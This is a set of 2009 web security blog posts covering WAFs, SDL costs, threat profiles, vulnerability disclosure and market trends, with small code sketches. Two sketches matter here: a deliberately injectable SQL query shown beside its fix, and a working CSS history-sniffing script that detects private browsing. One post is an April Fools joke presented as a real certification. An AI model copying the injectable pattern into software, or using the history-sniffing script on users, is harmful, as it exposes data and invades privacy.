I read a tremendous amount of online material, much of which originates from 200+ RSS feeds. Sure, the well-known blogs continue to generate great and timely content, but there are a few diamonds in the rough that don't get a lot of attention. They instead focus on quality rather than quantity, offering deep infosec business and technical analysis on subjects not well covered elsewhere. Figured I should share a few of my favorites.
Boaz Gelbord
With a business rather than technical tone, Boaz discusses how organizations act and react to events in the industry such as compliance, regulation, and law. He routinely explores how management, spending, and incentives influence organizational behavior.
ZScaler Research - Michael Sutton, Jeff Forristal, etc.
Heavy on the technical details and very timely with regard to Web security issues. Cross-Site Scripting, browser security, worms, etc. etc. What more could you want!?
Tactical Web Application Security - Ryan Barnett
A technical and operational point of view on Web security matters with great attack analysis.
HolisticInfoSec.org - Russ McRee
The best way I can describe Russ is that he keeps the infosec industry honest, and that includes vendors AND website owners. While exceptionally fair-minded, he's not at all shy about calling BS when he sees it.
The Spanner - Gareth Heyes
Deeply technical. Browser vendors, beware of Gareth Heyes, the master of HTML/JS code obfuscation. Encodings, strange "features", and XSS are just some of the topics covered in stellar detail.
Friday, May 08, 2009
WAFs and anti-SDL assumptions
When someone advocates Web Application Firewalls (WAF), some people mistakenly assume they must also be anti-Security Development Lifecycle (SDL). For myself and WhiteHat Security, nothing could be further from the truth. While WhiteHat advocates the use of WAFs, what most people do not realize is that we also develop a significant amount of mission-critical Web code in-house. Our SDL is incredibly important to us because, just like many of you, we have a development team responsible for building websites: websites responsible for safeguarding and maintaining access control over extremely sensitive data, our customers' data. That website would be WhiteHat Sentinel.
WhiteHat Sentinel, for all the mass-scale vulnerability scanning capabilities we are well known for, is also a sophisticated multi-user Web-based portal that manages website vulnerability data. Yes, we use WAFs, but don't assume for a moment this means we are pushing insecure code and thinking it will keep everything safe. No way! The fact is our systems are attacked constantly by robots, competitors, customers, third-party vendors, and everyone else you can imagine. We commonly receive free (unauthorized) scans by products such as AppScan and WebInspect, which is somewhat ironic. We also routinely attack ourselves: Sentinel scans Sentinel. Through it all our system MUST continue humming along securely 24x7x365. That can't happen without a commitment to software security.
After nearly a decade we are used to this type of environment. It is part of being in the industry, and this visibility is one thing that keeps us on the ball. We know that if we let down our guard, if only for a moment, bad things will surely happen, just as they have to so many other security vendors named in unfortunate headlines. In my opinion complacency is the enemy of security, even more so than complexity. While I can't describe all the processes we employ to protect the data, I can say they are significant. I'll see what I can do about dedicating some future posts to our internal development processes. Who knows, some people might be interested. In the meantime, one can assume we are loaded up with network, host, and yes, even software security products and processes.
Real-World website vulnerability disclosure & patch timeline
Protecting heavily trafficked and high-value websites can be an interesting InfoSec job to say the least. One thing you quickly learn is that you are under constant attack by essentially everyone, with every technique they've got, all the time. Noisy robots (worms & viruses) and fully targeted attackers are just par for the course. Sometimes the attackers are independent researchers testing their mettle, or the third-party security firm hired to report what all the aforementioned attackers already know (or are likely to know) about your current security posture.
When new Web code is pushed to production, it's a really good idea to have a vulnerability assessment scheduled immediately after to ensure security, separate from any SDL defect-reduction processes. PCI-DSS requires this of merchants. At this point it becomes a "find and fix" race between the good guys and the bad guys to identify any previously unknown issues. Below is a real-world website vulnerability disclosure and patch timeline from a WhiteHat Sentinel customer who takes security, well, very seriously. The website in question is rather large and sophisticated.
* Specific dates and times have been replaced with elapsed time (DD:HH:MM) to protect the identity of those involved. Some exact dates/times could not be confirmed.
??:??:?? - New Web code is pushed to a production website
00:00:00 - WhiteHat Sentinel scheduled scan initiates
02:19:45 - Independent researcher notifies website owner of a website vulnerability
02:20:19 - WhiteHat Sentinel independently identifies (identical) potential vulnerability
* WhiteHat Sentinel scan total time elapsed: 00:26:19 (excluding blackout windows)
02:21:24 - Independent researchers publicly discloses vulnerability details
02:23:18 - WhiteHat Operations verifies Sentinel discovered vulnerability (customer notification sent)
02:23:45 - Website owner receives the notifications and begins resolution processes
03:00:00 - WhiteHat Operations notifies customer of public disclosure
??:??:?? - Web code security update is pushed to production website
03:09:06 - WhiteHat Sentinel confirms issue resolved
Notice the independent researcher reported the exact same issue we found, less than an hour before we found it! They could just as easily have chosen not to disclose. Also note the customer's speed of fix, under 12 clock hours, which is stellar considering most fixes take weeks or months. As you can see, the bad guys are scanning and testing just as hard, fast, and continuously as we are, which is a little scary to think about.
Saturday, May 02, 2009
8 reasons why website vulnerabilities are not fixed
Some reasons I've heard over the years. In no particular order...
- No one at the organization understands or is responsible for maintaining the code.
- Features are prioritized ahead of security fixes.
- Affected code is owned by an unresponsive third-party vendor.
- Website will be decommissioned or replaced "soon".
- Risk of exploitation is accepted.
- Solution conflicts with business use case.
- Compliance does not require it.
- No one at the organization knows about, understands, or respects the issue.
Friday, May 01, 2009
Mythbusting: Secure code is less expensive to develop
Conventional wisdom says developing secure software from the beginning is less expensive in the long run. Commonly cited as evidence is an IEEE article, "Software Defect Reduction Top 10 List" (published January 2001), which states, "Finding and fixing a software problem after delivery is often 100 times more expensive than finding and fixing it during the requirements and design phase." Many security practitioners borrowed this metric (and others like it) in an effort to justify a security development life-cycle (SDL) investment, because software vulnerabilities can be viewed as nothing more than defects (problems). The reason is that it's much easier to demonstrate a hard return on investment by saying, "If we spend $X implementing an SDL, we will save $Y." This as opposed to attempting to quantify a nebulous risk value by estimating, "If we spend $X implementing an SDL, we'll reduce the risk of a $Y loss by B%."
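To make the contrast concrete, here is a tiny sketch of both justification styles. Every figure in it is a made-up assumption for illustration, not data from the article or from WhiteHat:

```typescript
// Hard-ROI form: "spend $X on an SDL, save $Y in later fix costs".
const sdlCost = 250_000;              // assumed SDL investment
const defectsPreventedEarly = 100;    // assumed defects caught in design instead of post-release
const postReleaseFixCost = 4_000;     // assumed cost to fix one defect after release
const hardSavings = defectsPreventedEarly * postReleaseFixCost - sdlCost;

// Risk form: "spend $X, reduce the risk of a $Y loss by B%".
const potentialLoss = 2_000_000;      // assumed loss from a serious breach
const breachLikelihood = 0.10;        // assumed yearly probability of that breach
const likelihoodReduction = 0.50;     // assumed reduction delivered by the SDL (the "B%")
const expectedRiskReduction = potentialLoss * breachLikelihood * likelihoodReduction - sdlCost;

console.log({ hardSavings, expectedRiskReduction });
```

The first number is easy to defend in a budget meeting; the second depends on two probabilities nobody can measure precisely, which is exactly the problem.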
The elephant in the room is that vulnerabilities are NOT the same as functional problems, and the quote from the aforementioned article references research from 1987. That's pre-World Wide Web! Data predating C#, Java, Ruby, PHP, and even Perl -- certainly reason enough to question its applicability in today's landscape. For now, though, let's focus on what a vulnerability is and isn't. A vulnerability is a piece of unintended functionality enabling an attacker to penetrate a system. An attacker might exploit a vulnerability to access confidential information, obtain elevated account privileges, and so on. A single instance represents an ongoing business risk until remediated, one not guaranteed to be realized, and may be acceptable according to an organization's tolerance for that risk. Said simply, a vulnerability does not necessarily have to be fixed for an application to continue functioning as expected. This is very different from a functional problem (or bug if you prefer) actively preventing an application from delivering service and/or generating revenue, which does have to be fixed (thank you, Joel!).
Functional defects often number in the hundreds, even thousands or more depending on the code base, easily claiming substantial portions of maintenance budgets. Reducing the costs associated with functional defects is a major reason why so much energy is spent evolving the art of software development into a true engineering science. It would be fantastic to eliminate security problems using the same money-saving logic before they materialize. To that end, best-practice activities such as threat modeling, architectural design reviews, developer training, source code audits, scanning during QA, and more are recommended. The BSIMM, a survey of nine leading software security initiatives, accounted for 110 such activities. Frequently these activities require fundamental changes to the way software is built and business is conducted. Investments starting at six to seven figures are not abnormal, so SDL implementation should not be taken lightly and must be justified accordingly. Therefore, the question we need to answer is: how much of what could we have eliminated upfront, and at what cost?
Our work at WhiteHat Security reveals websites today average about seven serious and remotely exploitable vulnerabilities, leaving the door open to compromise of sensitive information, financial loss, brand damage, violation of industry regulation, and downtime. For those unfamiliar with the methods commonly employed to break into websites, they are not buffer overflows, format string issues, and unsigned integers. Those techniques are most often applied to commercial and open source software. Custom Web applications are instead exploited via SQL Injection, Cross-Site Scripting (XSS), and various forms of business logic flaws -- the very same issues prevalent in our Top Ten list and, not so coincidentally, a leading cause of data loss according to Verizon's 2009 Data Breach Investigations Report: external attackers, linked to organized crime, exploiting Web-based flaws.
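For readers who have never seen one of these flaws up close, here is a minimal, hypothetical sketch of the kind of defect (and fix) being discussed. The `db.query` client, table, and column names are invented for illustration:

```typescript
// Vulnerable: user input is concatenated directly into the SQL string, so a
// value like  ' OR '1'='1  changes the meaning of the query.
async function findUserVulnerable(db: any, name: string) {
  return db.query("SELECT * FROM users WHERE name = '" + name + "'");
}

// Fixed: a parameterized query; the input is bound as data and never parsed as SQL.
async function findUserFixed(db: any, name: string) {
  return db.query("SELECT * FROM users WHERE name = $1", [name]);
}
```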
To estimate cost-to-fix, I queried my 1,100+ Twitter (@jeremiahg) followers (and other personal contacts) for how many man-hours (not clock time) it normally requires to fix (code, test, and deploy) a standard XSS or SQL Injection vulnerability. Answers ranged from 2 to 80 hours, so I selected 40 as a conservative value, paired with $100 per hour in hard development costs. Calculated:
40 man-hours x $100/hour
= $4,000 in labor costs to fix a single vulnerability
$4,000 x 7 (average # of vulnerabilities per website)
= $28,000 in outstanding insecure software debt
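For the spreadsheet-inclined, the same arithmetic as a quick sketch, using nothing but the assumed figures above:

```typescript
const manHoursPerFix = 40;      // conservative estimate from the informal survey
const hourlyRate = 100;         // assumed hard development cost per hour (USD)
const avgSeriousVulns = 7;      // average serious vulnerabilities per website

const costPerVuln = manHoursPerFix * hourlyRate;             // $4,000
const insecureSoftwareDebt = costPerVuln * avgSeriousVulns;  // $28,000

console.log(`Per vulnerability: $${costPerVuln}, per website: $${insecureSoftwareDebt}`);
```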
To be fair, there are outlier websites so insecure, such as those having no enforced notion of authorization, that the entire system must be rebuilt from scratch. Still, we should not automatically assume supporting Web-based software is the same as supporting traditional desktop software, as the differences are vast. Interestingly, even if the aforementioned 100x-less-expensive-to-fix-during-the-design-phase metric still holds true, the calculated estimates above do not seem to be a cause for serious concern. Surely implementing a regimented SDL to prevent vulnerabilities before they happen is orders of magnitude more expensive than the $28,000 required to fix them after the fact. When you look at the numbers in those terms, a fast-paced and unencumbered release-early-release-often development model sounds more economical. Only it isn't. It really isn't. Not due to raw development costs mind you, but because the risks of compromise are at an all-time high.
Essentially every recent computer security report directly links the rise in cybercrime, malware propagation, and data loss to Web-based attacks. According to Websense, "70 percent of the top 100 most popular Web sites either hosted malicious content or contained a masked redirect to lure unsuspecting victims from legitimate sites to malicious sites." The Web Hacking Incident Database has hundreds more specific examples, and when a mission-critical website is compromised it is basically guaranteed to surpass $28,000 in hard and soft costs. Down time, financial fraud, loss of visitor traffic and sales when search engines blacklist the site, recovery efforts, increased support call volume, FTC and payment card industry fines, headlines tarnishing trust in the brand, and so on are typical. Of course this assumes the organization survives at all, which has not always been the case. Pay now or pay later; this is where the meaningful costs are located. Reducing the risk of such an event, and minimizing the effects when it does occur, is a worthwhile investment. How much to spend is proportional to each organization's tolerance for risk and the security professional's ability to convey that risk accurately to the stakeholders. At the end of the day, having a defensible position of security due care is essential. This is a big reason why implementing an SDL can be less expensive than not.
Friday, April 17, 2009
Software Security grew to nearly $500M in 2008
Separate from an economy in recession, I'm excited to be part of a market with a healthy, if not impressive, growth clip. Gary McGraw (Cigital) published his Software Security annual revenue numbers for 2008. Combining software security tools, Software-as-a-Service providers, and professional services, it comes really close to half a billion dollars. This means a lot to us vendors, our investors, and would-be acquirers; the average enterprise can feel free to ignore it. Instead, focus on the particular solutions you need rather than basing vendor selection on prevailing winds. To do otherwise is similar to buying a house locally based upon national real estate averages.
2008 showed scanning tool (black and white box) sales continuing to climb, but the heavily fragmented pen-testing side is pulling in the lion's share of the cash. This is to be expected if I was right about the general market migration mirroring that of network security. Time will tell. However, I took issue with some of Gary's conclusions, and I'm hopeful he'll set me straight.
"In 2007, the white box code review companies’ combined revenue eclipsed the black box Web app testing tool vendors’ combined revenue. As Figure 2 above shows, this trend continues in 2008. I think this is a very healthy development, demonstrating that the market is becoming ever more interested in solving software security issues and not simply diagnosing them."
Not so fast! Is that really fair to assume? By the same logic, could we also conclude that McDonald's offers better meat than Morton's (a popular steakhouse) because of the volume sold? Or is that equally unfair? Here's another bit that doesn't feel right and deserves context...
"I am aware of 35 large-scale software security initiatives currently underway."
Certainly there are more than 35 deployed Web Application Firewalls in the world (or even in the U.S), but we wouldn’t automatically conclude that organizations are happier to band-aid the software (in)-security problem than fix it at the source.
When it's all said and done, I like numbers. Publish what we have, good or bad, analyze it, and improve over time.
Website threats and their capabilities
Vulnerabilities don't exploit themselves. Someone or something (a "threat") uses an attack vector to exploit a vulnerability in an asset, bypassing a control, and causes a technical or business impact. A diagram found in OWASP Catalyst (pg. 28) illustrates the concept exceptionally well. This is important to keep in mind because not every threat exercises the same technical capability or has the same end goal. Some threats are sentient, others are autonomous, and their methods differ, as does their target selection. While I've seen many published threat models, I've not seen any specifically focused on the nuances of website security (maybe I missed it?). Website security is much different from other forms of software or business models and deserves special attention in how it's handled.
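As a rough sketch, that chain can be written down as a simple record; the field names below are mine, not OWASP's:

```typescript
interface ExploitEvent {
  threat: string;           // who or what: sentient attacker, worm, bot
  attackVector: string;     // e.g. "SQL Injection via a search parameter"
  vulnerability: string;    // the weakness in the asset that gets exploited
  asset: string;            // e.g. "customer-facing e-commerce website"
  bypassedControl?: string; // e.g. "input validation", "WAF rule set"
  impact: string;           // technical or business impact, e.g. "card data theft"
}

const example: ExploitEvent = {
  threat: "automated worm",
  attackVector: "mass SQL injection against a vulnerable query string parameter",
  vulnerability: "unsanitized input concatenated into SQL",
  asset: "back-end product database",
  impact: "malicious IFRAMEs served to every visitor",
};
```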

After studying Verizon's 2009 Data Breach Investigations Report, you learn a few things about what or who we're up against. Most threats are external, use SQL Injection en masse, and are linked to organized crime. This means they don't typically have access to the source code or binaries of the custom Web applications they exploit (not that they need it). This threat profile is different from someone analyzing a piece of operating system software to uncover a 0-day, who may test locally 24x7 without raising alarms. It is also different from scanning a network for unpatched issues open to a ready-made exploit. Verizon goes further to organize the apparent threats into three types based upon how they choose their targets:
Random opportunistic: Victim randomly selected
Directed opportunistic: Victim selected, but only because they were known to have a particular exploitable weakness
Fully targeted: Victim was chosen and then attack planned
To make these a bit more website-security specific, I took the liberty of crafting some quick descriptions and the associated activities a threat might perform as part of its attack vectors, as a way of getting things started.
Random opportunistic: Attacks are completely automated, noisy, unauthenticated, and exploit well-known unpatched issues and some custom Web application vulnerabilities. Targets are chosen indiscriminately through wide scans and tend to be the most vulnerable. Typical motivation is to infect Web pages with malware or subtle defacement.
Example: In the mass SQL injection attacks, automated worms insert malicious JavaScript IFRAMEs (pointing to malware servers) into back-end databases and use that capability to exploit unpatched Web browsers.
Directed opportunistic: Attacker with professional or open source scanning tools. May register accounts, authenticate, and customize exploits for custom Web application flaws found easily by automation. Targets are those with valuable data that can be monetized, a tarnishable brand, and defenses penetrable within a few days of effort.
Example: XSS vulnerabilities used to create very convincing phishing scams that appear on the real website as opposed to a fake. JavaScript malware steals victims' session cookies and passwords.
Fully targeted: Highly motivated attacker with professional, open source, and purpose-built scanning tools. May register accounts, authenticate, customize exploits for custom Web application vulnerabilities, and capitalize on business logic flaws. Victims may be defrauded, extorted, and targeted for anywhere up to a year or more.
Example: 'The Analyzer' allegedly hacked into multiple financial institutions using SQL Injection to steal credit and debit card numbers that were then used by thieves in several countries to withdraw more than $1 million from ATMs.
By aligning a threat's capabilities against a particular security control, it becomes much easier to predict and/or justify that control's effectiveness. The same is true for vulnerability assessment results, which SHOULD give some type of assurance or measure of the risk posed by a particular threat. Just randomly choosing a set of vulnerabilities to scan for doesn't exactly give you that.
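Here is one way that alignment might be sketched out in code. The capability flags and the coverage assumed for a signature-based control are illustrative only, not a formal model:

```typescript
type TargetSelection = "random opportunistic" | "directed opportunistic" | "fully targeted";

interface ThreatProfile {
  selection: TargetSelection;
  authenticates: boolean;         // willing to register accounts and log in
  customizesExploits: boolean;    // adapts attacks to the specific application
  abusesBusinessLogic: boolean;   // flaws no generic signature will catch
}

// Capabilities a hypothetical signature-based control is assumed to counter.
const signatureBasedControl = {
  authenticates: true,
  customizesExploits: true,
  abusesBusinessLogic: false,
};

function likelyEffective(threat: ThreatProfile, covers: typeof signatureBasedControl): boolean {
  // The control is only a good bet if it addresses every capability the threat brings.
  return (!threat.authenticates || covers.authenticates) &&
         (!threat.customizesExploits || covers.customizesExploits) &&
         (!threat.abusesBusinessLogic || covers.abusesBusinessLogic);
}

const fullyTargeted: ThreatProfile = {
  selection: "fully targeted",
  authenticates: true,
  customizesExploits: true,
  abusesBusinessLogic: true,
};

console.log(likelyEffective(fullyTargeted, signatureBasedControl)); // false
```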

Thursday, April 02, 2009
Disagree with the Concept or Implementation?
Web Application Firewalls, Professional Certifications, Website Trust Logos, and Compliance Regulations are contentious topics that spark spirited debates by those for and against their existence. For years I've studied thoughtful arguments voiced by many people about why they disagree with these things (solutions?), often with logic that is hard to discount. What's interesting is that the vast majority of the time it's only the current implementation by particular security vendors that is opposed. We all know many vendors abuse customers with over-promising marketing, under-delivering products, and selling/doing/saying anything for a buck. This reality will never go away; we can only expose the behavior. And it is also very different from saying that the concept behind the solutions shouldn't exist at all or be offered by someone capable of doing better.
For example, three years ago, like basically everyone in webappsec at the time, I was a staunch WAF opponent. The WAF concept made no sense to me, because why would anyone go through the pain of implementing such a device when they could simply fix the code and be done forever? That was until one day, while compiling Sentinel vulnerability statistics, the volumes being identified revealed a problem so massive, pent up by over a decade of egregiously insecure Web code, that it obviously could not be solved with available fix-the-code resources (time/cost/skill) anytime soon. IT Security personnel also shared their pain of having no authority over development groups, no juice with the business to fix vulnerabilities over adding new features, and limited options to protect the websites they were responsible for. Malicious exploitation seemed to be the only thing that genuinely stimulated action.
IT Security clearly needed an operational solution. The only answer to the aforementioned problem was the promise of a WAF. Whether or not they functioned as advertised became immaterial; the bottom line was we needed WAFs to work! Seriously, it's insane to think it's possible to mitigate millions of vulnerabilities across millions of websites, even if you could find them (the vulns or the sites). Seeing the writing on the wall, I invested myself in WAF technology, shifting my objection from concept to implementation, and set out to see what WhiteHat could contribute. That eventually led to the VA+WAF solution, where vulnerabilities found through our assessment process can be imported as customized rules into a WAF. This provides a viable option to mitigate now and remediate the source of the problem in the time and manner that makes business sense ... to them.
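To give a flavor of the VA+WAF idea, here is a minimal sketch that turns a verified finding into a virtual-patch rule. The finding fields and the ModSecurity-style rule text are illustrative assumptions, not Sentinel's actual export format:

```typescript
interface Finding {
  id: number;
  vulnClass: "Cross-Site Scripting" | "SQL Injection";
  path: string;       // e.g. "/search"
  parameter: string;  // e.g. "q"
}

// Deny requests to the vulnerable path when the parameter carries characters
// the assessment showed the application does not handle safely.
function toVirtualPatch(f: Finding): string {
  const pattern = f.vulnClass === "Cross-Site Scripting" ? "[<>]" : "('|--|;)";
  return [
    `SecRule REQUEST_FILENAME "@beginsWith ${f.path}" \\`,
    `    "id:${100000 + f.id},phase:2,deny,log,msg:'Virtual patch for finding ${f.id}',chain"`,
    `    SecRule ARGS:${f.parameter} "@rx ${pattern}"`,
  ].join("\n");
}

console.log(toVirtualPatch({
  id: 42,
  vulnClass: "Cross-Site Scripting",
  path: "/search",
  parameter: "q",
}));
```

The point is not the rule syntax; it is that a confirmed, specific vulnerability can be shielded in minutes while the code fix waits its turn in the release schedule.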
As always, I'm curious to know what others think and how they characterize their opinions on the following solutions. If you disagree with them, is it on the basis of Concept or Implementation (and why)?
Web Application Firewalls - ?
Professional Certifications - ?
Website Trust Logos - ?
Compliance Regulations - ?
Wednesday, April 01, 2009
New cert program for Application Security Specialists

Love them or hate them, certifications are a part of the information security industry. As waves of newcomers flood into the emerging application security field, overwhelming hiring managers, it's imperative that true "specialists" distinguish themselves from the general InfoSec practitioner. Obtaining a respected certification is one way for a professional to do exactly that while simultaneously increasing their credibility. Still, the challenge for many is the lack of time to study, attend classes, and take exams, plus the high costs involved -- not to mention healthy skepticism of the value provided by such programs. What we do know is the more exclusive and specialized a certification is, the more value it may hold. So when I heard that The Institute for Certified Application Security Specialists (ASS) was offering a program, I had to investigate.
After visiting their site and reading the literature, I must say I was thoroughly impressed. I was previously aware of the CSSLP program, but their process was a little too involved. Conversely, the Institute created a streamlined program to meet the requirements of both organizations and individuals in today's fast-evolving application security landscape. The ASS certification takes into account previous work experience, industry standards and best practices, includes a sound Code of Ethics, and even a well thought out Oath of Office. That way certification holders can rest assured they'd be in good company. Should an applicant qualify for an official certification, they can obtain one without examination in minutes with a 3-step process (see right-side column) at a cost anyone can easily afford. After successful completion a person may proudly proclaim they are a Certified ASS!
Having experienced the process personally, I'm confident this offering will become very popular. Lastly, be aware that according to the terms, certifications are only valid up until the release of Web 3.0, where additional standards may apply.
Thursday, March 26, 2009
Website security needs a strategy

The Web security industry supposedly advocates a strategy based upon risk reduction, but predominantly practices defect reduction as the measuring stick. This is NOT the same thing and provides no assurance that a website is more secure against an attack of a certain capability. Then in the next breath, as Pete Lindstrom points out, we ironically consider those with the most identified/patched vulnerabilities as the least secure. Simultaneously the community engages in endless ideological debates about black box testing versus source code reviews, the value of the SDL pitted against Web Application Firewalls, certification as opposed to field experience, and vast collections of "best practices" suggested as appropriate for everyone in every case. Confusion and frustration are a reader's takeaway. It must be understood that each component can be seen as a piece of the puzzle, if only done so without losing sight of the bigger picture -- which is...
How to conduct e-commerce securely and remain consistent with business goals
To be successful companies need a plan -- a common sense approach to building an enterprise risk-based strategy. A system enabling solutions to be implemented in the time and place that maximizes return, demonstrates success, and by extension justifies the investment to the business in the language they understand. A strategy that perhaps begins by addressing the most common question, “Where do I start?” One simple answer is to locate, value, and prioritize an organization’s websites. Go further by assisting the business units in understanding the relevant issues such as “What do we really need to be concerned about first?” Describe the most likely threats (attackers), their capabilities, motives and which vulnerability classes are most likely to be targeted. Only when you know what you own, how much it’s worth, and what attack types must be defended against, according to business objectives, can security be applied in a risk-based fashion.
The problem CIOs and CSOs are facing is that the pseudo Web security standards available are completely inadequate for accomplishing the task. I am not the first to have called out this need. This is what Arian Evans has been talking at length about. As have Rafal Los, Ryan Barnett, Boaz Gelbord, Michael Dahn, Rich Mogull / Adrian Lane, Wade Woolwine, Nick Coblenz, Richard Bejtlich, Gunnar Peterson and likely many others. Many of the building blocks necessary for building a standard are scattered around the Internet including secure software programs, testing guides, and top X lists. These tactical documents could potentially be leveraged into a higher-level framework and serve as the basis for a mature risk-based enterprise website security strategy. The OCTAVE Method, FAIR, ISO 27001/2, among others, also contain well thought out and accepted concepts which we could use as a model.
It is imperative now more than ever that such a resource exists to satisfy a clearly unfulfilled need. CIOs and CSOs know there is a Web security problem. Now they seek guidance in how to develop a program that is flexible enough to meet their individual needs, which can also demonstrate success in manageable increments. I’ve been in contact with several industry thought leaders and enterprise security managers who have expressed personal interest, even excitement, in building out such a system. It is time to start helping ourselves answer the question, “Who is winning the game?”
I feel very strongly about the importance of this effort and I'll be dedicating personal time to see the idea go forward. To move ahead quickly, the Web Application Security Consortium (WASC) and The SANS Institute are planning to initiate a joint open community project (to be named later). If you would like to get involved, please stay tuned for more details.
Thursday, March 19, 2009
Quick Wins and Web Application Security
Lately I've been asking peers why they think comparatively few dollars are spent addressing Web application security (as a percentage relative to host/network), which every industry report states represents the largest information security risk. Is the reason that organizations don't "get it"? Are available solutions ineffective? Do compliance failures need more teeth? Does the market need more time to mature? The answer is crucial, because without funds there is no way to secure the vast majority of insecure websites, and we all suffer as a result. A combination of factors is probably a fair estimation, but the more I dig in, the more I'm convinced something more powerful and yet mundane hides just beneath the surface. A recent conversation with Joseph Feiman (Gartner) revealed a profound insight. To paraphrase:
During an event, a panel of Gartner analysts asked the audience what the best way is for an organization to invest $1 million in an effort to reduce risk. The choices were Network, Host, or Application security, and the Gartner analysts made their cases for each of the three disciplines. The catch was the budget could not be shared between them and had to be prioritized into a single initiative. The audience selected Application security. However, the Gartner CSO (who took the role of CIO in the play) overruled the audience's decision. He instead selected Network security, while at the same time curiously agreeing that Application security would have been the better path. His rationale was that it is easier for him to show results to his CEO if he invests in the Network.
Think about that!
Consider for a moment that Website Security equals Software Security, which it does, plus much more. A maturing program will often require fundamental changes to business and code development processes. Policies need to be established, developers trained, staff hired, technology acquired, etc. An uphill battle requiring tremendous resources over the course of multiple years, with scars and lessons earned along the way. As an example, the Building Security In Maturity Model (BSIMM), a real-world set of software security comparisons, observes 110 different potential activities! At the same time, measuring the value obtained from defect reduction in terms of website risk mitigation is extremely difficult. This is not to say the evolution should not begin, but it's vital to understand the personal incentives that influence decision making.
A CIO's (and CSO's) average tenure at a company is roughly 4 years, so they may view a multi-year website/software security program with immeasurable returns as a risky career move. And rightly so! If the effort takes too long and the business loses patience, their credibility suffers. It is much safer to maintain the status quo spending on firewalls, A/V, network scans, and patch management, where metrics are easier to quantify, report, and justify. Still, I believe CIOs want to do the right thing if enabled. So I asked my 900+ Twitter followers (@jeremiahg) for ideas on how one might achieve "quick wins" in Web Application Security with measurable results that CIOs would appreciate. Several good ideas arose, mostly about reporting blocked attacks tied to defense measures, and interestingly not a single one mentioned the Software Development Life-cycle (SDL). I asked why, to which Chris Eng (@chriseng) of Veracode responded, "That's because SDL isn't quick." It then becomes crystal clear why justifying a proactive budget is difficult, to say the least. If we, the experts, don't know, how can we expect CIOs to do any better?!
What happens when a website gets hacked, you ask?
Simple. Risk transference and/or mitigation, but not necessarily reduction. Dollars free up shortly after an incident, but only enough to make the immediate problem go away, quickly, and usually only temporarily. Unfortunately that doesn't necessarily translate to a lasting software security program. A CIO may first act by terminating the programmer or third-party development shop that authored the code. There is also the option of decommissioning the website entirely, replacing it with an outsourced Software-as-a-Service provider, or bringing it in-house to manage internally. A Web Application Firewall could be deployed and a network scanning vendor commissioned to apply rubber-stamp assurance to show anyone asking. The point is, a CIO is compelled to demonstrate a level of success in short order and report why the same incident won't happen again. They are caught in a position forcing them to react tactically rather than strategically.
Seriously, what other real choice does a CIO or IT Security have!? Getting hacked again and again while implementing an expensive mega software security program whose results lie years away is not particularly attractive or practical. Something needs to happen immediately. This is a big reason why accurate vulnerability assessment results piped into Web Application Firewalls (VA+WAF) have become such an attractive option: a solution capable of identifying vulnerabilities, virtually patching them, and demonstrating success to the business in terms of risk reduction. Quick wins are possible in a matter of days or weeks, rather than years. A similar option is desperately needed from the software development side of the Web application security field: a program that produces measurable results quickly and can be built upon even after the CIO leaves. A win-win for all involved. If such a model exists, it's not well advertised.
The only other major budgetary lever is compliance where justification occurs without consideration of or a requirement for risk reduction, “We need money to do X because the standard says so.” For myself, and I think many others too, that is just not good enough. Lest we forget, compliance != security. So I’m asking again...How do you achieve quick wins in Web Application Security, rooted in software, with measurable results that CIOs would appreciate?
Detecting Private Browsing Mode
I shared the original concept with Collin Jackson, who developed the proof-of-concept code. The basic idea is that one might want to know whether a Web user is in Private Browsing mode in Safari or Firefox, Incognito mode in Google Chrome, or InPrivate mode in Internet Explorer 8. The way it works is by having someone visit a unique (never before seen) URL and then checking whether a link to that URL is treated as visited by CSS (the standard color history hack). If it isn't, then you know some privacy feature is actively blocking history.
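For the curious, here is a rough TypeScript sketch of the idea, not Collin's actual proof-of-concept. It assumes the page defines a style rule like a:visited { color: rgb(255, 0, 0); } and that the browser still exposes :visited styling through getComputedStyle, which was true of 2009-era browsers but is deliberately restricted today; the probe URL and timing are illustrative only.

```typescript
// Detect history suppression (i.e. a private browsing mode) by visiting a
// unique URL and then checking whether a link to it is styled as :visited.
function detectHistoryBlocking(): Promise<boolean> {
  return new Promise((resolve) => {
    // A never-before-seen URL on the current origin.
    const probeUrl = `${location.origin}/__history-probe__/${Date.now()}`;

    // Hidden link pointing at the probe URL.
    const link = document.createElement("a");
    link.href = probeUrl;
    link.style.display = "none";
    document.body.appendChild(link);

    // Load the probe URL in a hidden iframe so it *should* enter history.
    const frame = document.createElement("iframe");
    frame.style.display = "none";
    frame.src = probeUrl;
    frame.onload = () => {
      // Give the history entry a moment to register, then inspect the link.
      setTimeout(() => {
        const visited = getComputedStyle(link).color === "rgb(255, 0, 0)";
        // The URL was just visited; if the link never shows as :visited,
        // some privacy feature is blocking history.
        resolve(!visited);
      }, 100);
    };
    document.body.appendChild(frame);
  });
}
```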
Definitely not anything super serious, but worth putting out there in case someone might have further ideas.
Monday, March 16, 2009
Web Security Readers Digest
Over the last two weeks I visited 5 different cities across the U.S. As such I haven't had much time to blog; however, I did get a chance to get in some reading. Plane rides are good for that. There is a tremendous amount going on in Web security, far more than I could ever dig deeply enough into and blog adequately. So here is the abridged version of the things I found particularly interesting, in no particular order.
1) Robert Auger published “Socket Capable Browser Plugins Result In Transparent Proxy Abuse”, which appears to be a solid candidate for 2009’s Top Web Hacking Techniques. Yet more Intranet hacking goodness, but this time with a CERT VU#435052. Serious style points.
"When certain transparent proxy architectures are in use an attacker can achieve a partial Same Origin Policy Bypass resulting in access to any host reachable by the proxy via the use of client plug-in technologies (such as Flash, Applets, etc) with socket capabilities."
2) The software security gods give unto the people a Building Security In Maturity Model (BSIMM). Nine world-class software security initiatives were studied, including those of Brad Arkin (Adobe), Eric Baize (EMC), Alex Gantman (QUALCOMM), Eric Grosse (Google), David Hahn (Wells Fargo), Steve Lipner (Microsoft), and Jim Routh (DTCC). Want some insight into what the big boys are doing internally? This is the best way to compare your program to theirs.
3) Yes, Software-as-a-Service is all the rage. Yes, Software-as-a-Service in many cases is superior to and less expensive than enterprise software. Yes, as a Software-as-a-Service vendor specializing in website vulnerability assessments, I'm more than biased. The thing I like best about Software-as-a-Service, though, can be summarized by the following comment...
"In the traditional software sales model, the idea is to impress the customer in the beginning, make the sale and collect the big check. While the customer is certainly valued, this is really a model that benefits the software company. Conversely, SaaS is a recurring revenue model where vendors gain maximum value by retaining customers over the long term."
That is precisely how we approach our business and why our renewal rates are sky high. It is in our best interest to make sure customers are well taken care of. Conversely, if you buy some security software brand X, then basically you are on your own.
